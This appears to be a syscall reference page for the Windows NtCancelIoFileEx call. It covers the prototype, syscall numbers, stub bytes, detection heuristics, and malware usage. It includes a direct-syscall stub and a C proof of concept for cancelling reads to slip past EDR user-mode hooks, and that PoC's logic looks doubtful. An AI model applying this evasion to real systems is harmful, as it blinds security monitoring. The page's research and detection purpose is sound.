ntoskrnl.exeT1562.001T1106

NtCancelIoFileEx

Cancels a specific outstanding I/O request on a file, regardless of which thread issued it.

Prototype

NTSTATUS NtCancelIoFileEx(
  HANDLE           FileHandle,
  PIO_STATUS_BLOCK IoRequestToCancel,
  PIO_STATUS_BLOCK IoStatusBlock
);

Arguments

Name	Type	Dir	Description
FileHandle	HANDLE	in	Handle to the file / device / pipe whose I/O is to be cancelled.
IoRequestToCancel	PIO_STATUS_BLOCK	in	Optional pointer to the IO_STATUS_BLOCK that identifies a specific in-flight IRP. NULL cancels every outstanding IRP on the handle from any thread.
IoStatusBlock	PIO_STATUS_BLOCK	out	Receives the result of the cancel operation itself (Status, Information).

Syscall IDs by Windows version

Windows version	Syscall ID	Build
Win10 1507	0x8D	win10-1507
Win10 1607	0x8D	win10-1607
Win10 1703	0x8E	win10-1703
Win10 1709	0x8F	win10-1709
Win10 1803	0x90	win10-1803
Win10 1809	0x90	win10-1809
Win10 1903	0x90	win10-1903
Win10 1909	0x90	win10-1909
Win10 2004	0x92	win10-2004
Win10 20H2	0x92	win10-20h2
Win10 21H1	0x92	win10-21h1
Win10 21H2	0x92	win10-21h2
Win10 22H2	0x92	win10-22h2
Win11 21H2	0x92	win11-21h2
Win11 22H2	0x92	win11-22h2
Win11 23H2	0x92	win11-23h2
Win11 24H2	0x94	win11-24h2
Server 2016	0x8D	winserver-2016
Server 2019	0x90	winserver-2019
Server 2022	0x92	winserver-2022
Server 2025	0x94	winserver-2025

Kernel module

ntoskrnl.exe → NtCancelIoFileEx

Related APIs

CancelIoExNtCancelIoFileNtCancelSynchronousIoFileNtReadFileNtWriteFileNtDeviceIoControlFile

Syscall stub

4C 8B D1            mov r10, rcx
B8 94 00 00 00      mov eax, 0x94
F6 04 25 08 03 FE 7F 01   test byte ptr [0x7FFE0308], 1
75 03               jne short +3
0F 05               syscall
C3                  ret
CD 2E               int 2Eh
C3                  ret

Undocumented notes

Introduced in Vista to fix the single-thread scope limitation of NtCancelIoFile. With `IoRequestToCancel == NULL` it behaves like CancelIo but cross-thread; with a non-NULL IO_STATUS_BLOCK pointer, the kernel walks the file's IRP list, matches the IRP whose `UserIosb` equals the supplied pointer, and cancels exactly that one. The Win32 thunk `CancelIoEx` exposes the same two modes. The SSN moves only modestly: `0x90` on Win10 1803–1909, `0x92` on 2004–23H2, `0x94` on Win11 24H2 / Server 2025.

Common malware usage

The richer of the cancel triplet, and the one that is genuinely useful for **EDR hook bypass / race-cancel** patterns. The textbook attack: an EDR's user-mode `NtReadFile` hook performs synchronous content inspection before forwarding the call. By dispatching the read overlapped (`FILE_FLAG_OVERLAPPED`) and immediately calling `NtCancelIoFileEx` against the *specific* IO_STATUS_BLOCK from another helper thread, the read is yanked before the EDR's completion routine fires — leaving the EDR with `STATUS_CANCELLED` and no data to inspect. Real-world implants also use it for clean teardown of multi-threaded pipe / socket workers in C2 channels, and as a watchdog to abort hung `DeviceIoControl` calls against unresponsive minifilter drivers.

Custom EDR-hook-bypass tooling (race-cancel PoCs)Multi-threaded C2 implants (clean teardown)

Detection opportunities

Higher signal than NtCancelIoFile because the *targeted* form is far less common in benign software. Hooks on user-mode `CancelIoEx` plus ETW `Microsoft-Windows-Kernel-File` and the WPP IRP traces can correlate a sub-millisecond issue-then-cancel pattern on the same handle. A reliable heuristic: a thread that calls NtCancelIoFileEx with a non-NULL `IoRequestToCancel` pointing to an IO_STATUS_BLOCK *whose paired NtReadFile / NtWriteFile / NtDeviceIoControlFile completed in another thread less than a millisecond earlier*, while the file object is one of the EDR-protected handles (mfeavfk, csagent, MsSecFlt, etc.). EDRs that move inspection to a kernel minifilter (Defender's WdFilter, CrowdStrike's CSAgent) are immune to this race because their hook runs *before* the IRP completes back to user mode.

Direct syscall examples

asmx64 stub (Win11 24H2 SSN 0x94)

; Direct syscall stub for NtCancelIoFileEx
NtCancelIoFileEx PROC
    mov  r10, rcx          ; syscall convention
    mov  eax, 94h          ; SSN (Win11 24H2 / Server 2025)
    syscall
    ret
NtCancelIoFileEx ENDP

cRace-cancel against an EDR user-mode hook

// PoC: issue an overlapped read, then yank the IRP from a helper thread
// targeting the specific IO_STATUS_BLOCK before any synchronous EDR
// completion inspection can fire.
#include <windows.h>

typedef struct _IO_STATUS_BLOCK {
    union { NTSTATUS Status; PVOID Pointer; };
    ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef NTSTATUS (NTAPI *pNtCancelIoFileEx)(HANDLE, PIO_STATUS_BLOCK, PIO_STATUS_BLOCK);

typedef struct { HANDLE h; PIO_STATUS_BLOCK iosb; } cancel_ctx;

static DWORD WINAPI Yanker(LPVOID p) {
    cancel_ctx *c = (cancel_ctx*)p;
    pNtCancelIoFileEx NtCancelIoFileEx = (pNtCancelIoFileEx)GetProcAddress(
        GetModuleHandleA("ntdll.dll"), "NtCancelIoFileEx");
    IO_STATUS_BLOCK out = {0};
    return NtCancelIoFileEx(c->h, c->iosb, &out);
}

NTSTATUS RaceCancelRead(HANDLE h, PVOID buf, ULONG len) {
    OVERLAPPED ov = {0};
    DWORD got = 0;
    ReadFile(h, buf, len, &got, &ov);                  // hooked path
    cancel_ctx c = { h, (PIO_STATUS_BLOCK)&ov };       // OVERLAPPED layout == IO_STATUS_BLOCK
    HANDLE t = CreateThread(NULL, 0, Yanker, &c, 0, NULL);
    WaitForSingleObject(t, INFINITE);
    CloseHandle(t);
    return 0;
}

rustCross-thread cancel-all-on-handle

// Tear down every outstanding IRP on a handle from any thread.
use windows_sys::Win32::Foundation::HANDLE;
use windows_sys::Win32::System::IO::CancelIoEx;

pub unsafe fn cancel_all(h: HANDLE) -> bool {
    // CancelIoEx(h, NULL) — under the hood NtCancelIoFileEx with NULL IRP.
    CancelIoEx(h, std::ptr::null_mut()) != 0
}

MITRE ATT&CK mappings

Last verified: 2026-05-20